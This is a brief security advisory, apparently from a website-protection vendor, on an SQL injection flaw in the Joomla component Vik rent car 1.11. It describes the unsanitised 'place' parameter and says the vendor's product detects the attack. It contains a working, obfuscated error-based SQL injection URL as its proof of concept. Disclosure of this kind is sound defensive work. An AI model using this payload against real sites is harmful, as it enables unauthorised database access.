Vulnerability in the component Vik rent car 1.11

Platform: Joomla component Vik rent car 1.11

Attack Type:

  • Cross site scripting
  • Cross site request forgery
  • SQL injection
  • Local file inclusion
  • Layer 2 intrusion

Source: https://www.exploit-db.com/exploits/41604/

Proof of concept:
http://targetsite/index.php?option=com_vikrentcar&caropt=[SQL]&days=31&pickup=1490947200&release=1493542800&place=17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31

What can an attacker do with the attack?

Joomla websites running the component Vik rent car 1.11 are vulnerable to SQL injection. The vulnerability exists because the `place` parameter is neither validated nor sanitised before it is used in a database query. This allows an unauthenticated user to execute arbitrary SQL commands via the `place` parameter.

Can Centrora detect the attack?

Yes, Centrora detects this attack under the category of SQL injection.

The following are the contents of the attack as detected by Centrora.

